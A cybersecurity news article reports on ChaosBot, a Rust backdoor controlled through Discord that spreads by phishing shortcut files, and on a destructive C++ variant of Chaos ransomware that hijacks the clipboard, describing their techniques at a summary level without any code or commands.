A new Rust-based malware dubbed “ChaosBot” has emerged, utilizing Discord channels as a means to control victims’ computers. Cybersecurity researchers have revealed the intricacies of this backdoor, enabling threat actors to execute commands and conduct reconnaissance on compromised systems. The malware was initially detected within a financial services environment in late September 2025.
![NordVPN Plus - 1 Year - 10 Devices - VPN & Cybersecurity Software Bundle [Digital Download]](https://m.media-amazon.com/images/I/618QqPzeZfL._AC_UL320_.jpg)
ChaosBot stands out for its exploitation of Discord for command-and-control operations. Operated by an individual using the pseudonym “chaos_00019,” the malware leverages Discord channels to issue remote commands to infected devices. Another Discord account, “lovebb0024,” is also linked to the C2 activities of the malware.
![NordVPN Standard - 2 Year - 10 Devices - VPN & Cybersecurity Software [Digital Download]](https://m.media-amazon.com/images/I/61LppCuU6tL._AC_UL320_.jpg)
In addition to Discord, ChaosBot has been observed using phishing messages with malicious Windows shortcut files to propagate. Upon opening the LNK file, a PowerShell command triggers the download and execution of ChaosBot, while a decoy PDF file masquerades as legitimate correspondence to divert attention.
The malware’s payload, a malicious DLL named “msedge_elf.dll,” is loaded using the Microsoft Edge binary “identity_helper.exe.” This enables system reconnaissance and the deployment of a fast reverse proxy (FRP) to establish persistent access within compromised networks. Furthermore, attempts to configure a Visual Studio Code Tunnel service as an additional backdoor have been documented.
ChaosBot interacts with a Discord channel associated with the victim’s computer name to receive instructions from the operator. Supported commands include shell execution via PowerShell, screenshot capture, file downloads, and uploads. The malware employs evasion techniques to circumvent detection, such as patching system instructions and checking for virtual machine environments.
Fortinet FortiGuard Labs recently disclosed a new variant of Chaos ransomware written in C++, introducing destructive capabilities to delete files and manipulate clipboard content for cryptocurrency theft. This evolution signifies a shift towards more aggressive and multifaceted threats aimed at maximizing financial gain.
The Chaos-C++ ransomware downloader masquerades as fake utilities to deceive users into installation. It employs a combination of encryption methods and a versatile downloader to ensure successful execution. By incorporating destructive encryption and clipboard hijacking, the ransomware aims to enhance its financial fraud capabilities.
Chaos-C++ ransomware’s operational modes include monitoring the system clipboard, inhibiting recovery processes, and selectively encrypting files based on size. Previous iterations of Chaos ransomware, like Lucky_Gh0$t, were distributed under different disguises. The malware’s robust encryption methods make disruption challenging, enhancing its efficacy and resilience.
The emergence of Rust-based malware like ChaosBot underscores the evolving landscape of cyber threats, highlighting the adaptability and sophistication of malicious actors. As cybersecurity defenses continue to evolve, staying vigilant and proactive is crucial to mitigating the risks posed by such advanced threats.
📰 Related Articles
- Black Hat SEO Exploits AI to Spread Malware
- itch.io Domain Takedown: Lessons in Automated System Risks
- Worcester Transit Advocates Push for Enhanced Bus Rapid System
- West Side Market Extends Free Parking, Introduces QR Code System
- Victorian Bar Addresses Court Delays Impacting Legal System Efficiency